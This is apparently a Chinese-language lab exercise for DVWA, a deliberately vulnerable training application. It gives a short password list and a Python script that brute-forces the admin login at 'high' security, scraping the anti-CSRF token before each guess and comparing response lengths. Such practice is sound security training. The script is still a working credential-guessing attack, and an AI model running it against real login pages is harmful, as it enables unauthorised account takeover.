密碼文件psw.txt跟python文件同級目錄下,內容:
111
222
password
444
5555555555555555
test.py內容如下:
import requests
import re,time
head = {
'Host': '192.168.1.70',
'Upgrade-Insecure-Requests': '1',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36',
'Accept': r'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
'Referer': r'http://192.168.1.70/dvwa/vulnerabilities/brute/index.php?username=admin&password=111&Login=Login&user_token=bbf84925fed8ba075c4e8b39f370e9bc',
'Accept-Language': r'zh-CN,zh;q=0.9',
'Cookie': 'security=high; PHPSESSID=61b69n6238mpdhu05puisaok00', #登錄後複製PHPSESSID
'Connection': 'close'
}
file = open('psw.txt','r')
url = r'http://192.168.1.70/dvwa/vulnerabilities/brute/'
dvwa_session = requests.Session()
print(time.strftime('%Y-%m-%d %H:%M:%S',time.localtime()))
for line in file:
resp = dvwa_session.get(url=url, headers=head)
token = re.search(r'[a-z0-9]{32}',resp.text).group()
password = line.rstrip()
url2 = r'http://192.168.1.70/dvwa/vulnerabilities/brute/index.php?username=admin&password=' + password + '&Login=Login&user_token=' +str(token)
res = dvwa_session.get(url=url2,headers=head)
print(password.strip(),len(res.text))
file.close()